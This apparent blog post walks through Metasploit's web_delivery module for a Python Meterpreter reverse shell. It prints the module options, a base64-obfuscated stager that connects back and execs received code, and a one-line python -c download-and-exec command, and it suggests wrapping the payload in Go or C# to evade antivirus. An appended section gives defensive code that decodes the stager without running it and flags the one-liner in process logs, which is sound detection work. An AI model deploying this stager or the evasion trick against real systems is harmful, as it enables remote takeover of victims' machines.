Loading Meterpreter with Python: web_delivery code

Posted by 神棍先生 on 2017-08-25

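Copyright notice: this article may be the blogger's original work; it may be freely reproduced as long as the source is credited. https://blog.csdn.net/Jailman/article/details/77574162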

web_delivery options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /test            no        The URI to use for this exploit (default is random)

Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Python

Contents of the generated file

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCcxMjcuMC4wLjEnLDQ0NDQpKQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

Invocation command

python -c "import urllib2; r = urllib2.urlopen('http://127.0.0.1:8080/test'); exec(r.read());"

The payload statement executed via PowerShell can be wrapped in golang or C# to achieve antivirus evasion.
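
For triage of the two artifacts shown above (the served script and the fetch-and-exec one-liner), the following added example, which is not part of the original post, decodes the embedded base64 stage without executing it, extracts the callback address, and flags the one-liner pattern in a process command line. The function names, regular expressions and sample data (documentation address 192.0.2.10) are constructed for this illustration.

```python
import base64
import binascii
import re

# Base64 literal that ends up inside exec(base64.b64decode(...)), possibly via a wrapper
B64_EXEC = re.compile(
    r"exec\s*\(\s*base64\.b64decode\(.*?['\"]([A-Za-z0-9+/=]{16,})['\"]", re.S)
# connect(('host', port)) inside the decoded stage
CONNECT = re.compile(r"connect\(\(\s*['\"]([^'\"]+)['\"]\s*,\s*(\d+)\s*\)\)")
# python -c one-liner that fetches a URL and exec()s the response body
FETCH_EXEC = re.compile(r"python[\d.]*\s+-c\s.*urlopen\(.*exec\(", re.S | re.I)


def decode_stage(script):
    """Return the decoded inner stage as text, or None. Nothing is executed."""
    m = B64_EXEC.search(script)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", "replace")


def callback_endpoints(script):
    """List the (host, port) pairs the decoded stage would connect to."""
    stage = decode_stage(script)
    if stage is None:
        return []
    return [(host, int(port)) for host, port in CONNECT.findall(stage)]


def is_fetch_and_exec(cmdline):
    """True if a process command line matches the download-and-exec pattern."""
    return bool(FETCH_EXEC.search(cmdline))


# Constructed sample data (assumption, not taken from the page).
_inner = ("import socket\ns=socket.socket(2,socket.SOCK_STREAM)\n"
          "s.connect(('192.0.2.10',4444))\n")
SAMPLE_SCRIPT = ("import base64,sys;exec(base64.b64decode({2:str,3:lambda b:"
                 "bytes(b,'UTF-8')}[sys.version_info[0]]('%s')))"
                 % base64.b64encode(_inner.encode()).decode())
SAMPLE_CMD = ("python -c \"import urllib2; r = urllib2.urlopen("
              "'http://192.0.2.10:8080/test'); exec(r.read());\"")

if __name__ == "__main__":
    print(callback_endpoints(SAMPLE_SCRIPT), is_fetch_and_exec(SAMPLE_CMD))
```

The command-line check is meant for process-creation telemetry (for example auditd execve records or EDR process events); the decoder is meant for script bodies recovered from proxy logs or packet captures.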